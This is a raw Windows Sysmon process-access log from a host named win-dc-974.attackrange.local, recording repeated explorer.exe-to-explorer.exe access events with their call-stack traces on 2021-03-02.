16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235574Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235573Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235572Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235571Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235570Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235569Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235568Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235567Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235566Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235565Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235564Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235563Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235562Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235561Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235560Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235559Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235558Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235557Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235556Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235555Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235554Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235553Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235552Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235551Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235550Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235549Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235548Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.590{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235547Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 